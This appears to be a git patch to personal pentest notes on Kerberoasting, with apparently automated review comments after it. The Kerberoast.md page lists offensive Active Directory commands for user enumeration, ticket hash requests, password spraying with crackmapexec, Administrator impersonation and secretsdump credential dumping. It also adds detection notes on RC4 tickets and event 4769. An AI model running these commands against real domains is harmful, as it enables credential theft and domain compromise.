From ccaa96dab551e089b3947e62cd4fb70ad3943234 Mon Sep 17 00:00:00 2001 From: gurkenhabicht Date: Fri, 3 Apr 2026 21:17:36 +0200 Subject: [PATCH] added kerberoastable information --- Enumeration/Kerberoast.md | 38 +++++++++++++++++++++++---------- Forensics/Windows Event Logs.md | 1 + 2 files changed, 28 insertions(+), 11 deletions(-) diff --git a/Enumeration/Kerberoast.md b/Enumeration/Kerberoast.md index 0d980ab..76318f1 100644 --- a/Enumeration/Kerberoast.md +++ b/Enumeration/Kerberoast.md @@ -1,5 +1,10 @@ # Kerberoast +An indicator for kerberoast are downgraded RC4 encryption instead of AES. +That means `Ticket_Encryption_Type=0x17` (RC4) instead of `0x12` (AES-256). + +The event code for TGS, which is needed for kerberoasting is `4769`. + ## Usage ### List users @@ -10,17 +15,21 @@ kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade ``` ### Get Users + * Impacket's `GetNPUsers.py` to get Hashes of userlist + ```sh GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes ``` ### Find SPNs - + ```sh -GetUserSPNs.py -request /: -dc-ip $TARGET_IP +GetUserSPNs.py -request /: -dc-ip $TARGET_IP ``` + or + ```sh pyverview get-netuser -u -p -t -d ``` @@ -32,12 +41,17 @@ findDelegation.py -debug /: -dc-ip $TARGET_IP ``` ### Check Found Users -* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py` + +Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py` + ```sh crackmapexec smb $TARGET_IP -u users.txt -p pass.txt ``` - * Watch out for `STATUS_PASSWORD_MUST_CHANGE` - * Change password with + +Watch out for `STATUS_PASSWORD_MUST_CHANGE` + +Change password with + ```sh smbpasswd.py @$TARGET_IP -newpass password123 ``` 
@@ -47,10 +61,12 @@ smbpasswd.py @$TARGET_IP -newpass password123 ```sh getST.py -spn / -impersonate Administrator '/:' -dc-ip $TARGET_IP ``` -* Serviceticket is save as `Administrator.ccache` -* `export KRB5CCNAME=Administrator.ccache` -* After that dump secrets -```sh -secretsdump.py -k -no-pass -``` +* Serviceticket is safe as `Administrator.ccache` +* `export KRB5CCNAME=Administrator.ccache` + +After that dump secrets: + +```sh +secretsdump.py -k -no-pass +``` diff --git a/Forensics/Windows Event Logs.md b/Forensics/Windows Event Logs.md index f688420..952c0e0 100644 --- a/Forensics/Windows Event Logs.md +++ b/Forensics/Windows Event Logs.md @@ -65,6 +65,7 @@ The `subject` is the account doing an action on an `object`. * **4756**: Attempt to add an account to a universal security group * **4757**: Attempt to remove an account from a universal security group * **4768**: Kerberos TGT request +* **4769**: Kerberos TGS request * **4771**: Kerberos pre-auth failure ### Account Logon
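Review bot: the indicator paragraph added in the first hunk of Enumeration/Kerberoast.md is grammatically off and slightly imprecise. `An indicator for kerberoast are downgraded RC4 encryption instead of AES.` should read `An indicator for Kerberoasting is a service ticket requested with RC4 encryption instead of AES.` Spell out what the values mean: `0x17` is RC4-HMAC and `0x12` is AES256-CTS-HMAC-SHA1-96 (`0x11` is AES128), and an RC4 ticket is only a strong signal when the service account otherwise supports AES, since legacy accounts may still legitimately use RC4. The last sentence would be clearer as `Kerberoasting requires a TGS request, which the domain controller logs as event 4769 in its Security log.`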
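Review bot: the `### Get Users` block in the second Kerberoast.md hunk documents `GetNPUsers.py`, which performs AS-REP roasting (logged by the DC as a 4768 TGT request, not a 4769), so the indicator paragraph added at the top of the file does not describe this step; add a sentence saying so or move the step to its own section. While in this region, the context line `pyverview get-netuser -u -p -t -d` looks like a typo for `pywerview`. The remaining changes in this hunk (trailing-whitespace removal in `### Find SPNs` and the blank lines around `or`) are fine.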
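Review bot: converting the bullets to paragraphs in the `### Check Found Users` hunk is fine, but the sentences lost their punctuation; `Watch out for `STATUS_PASSWORD_MUST_CHANGE`` and `Change password with` should end with a period or colon. More importantly, the `smbpasswd.py ... -newpass password123` step changes the account's password on the domain and is not a passive enumeration step; the text should say so explicitly and use a placeholder rather than the hard-coded `password123` in what reads as a copy-paste command.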
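Review bot: the wording fix in the last Kerberoast.md hunk went the wrong way: `Serviceticket is save as` became `Serviceticket is safe as`, but the intended word is `saved`, i.e. `* Service ticket is saved as `Administrator.ccache``. Separating `After that dump secrets:` into its own paragraph also leaves a three-step sequence split between two bullets and a paragraph; keep all three steps as list items or all as prose.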
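Review bot: the `4769` entry added to Forensics/Windows Event Logs.md keeps the list in numeric order and the description matches the event's title (`A Kerberos service ticket was requested`), but to support the Kerberoast indicator referenced in Enumeration/Kerberoast.md it should name the fields a responder filters on: `Ticket Encryption Type` (`0x17` for RC4) and `Service Name` (excluding `krbtgt`). It is also worth noting that 4769 is only emitted when the `Audit Kerberos Service Ticket Operations` subcategory is enabled on the domain controllers.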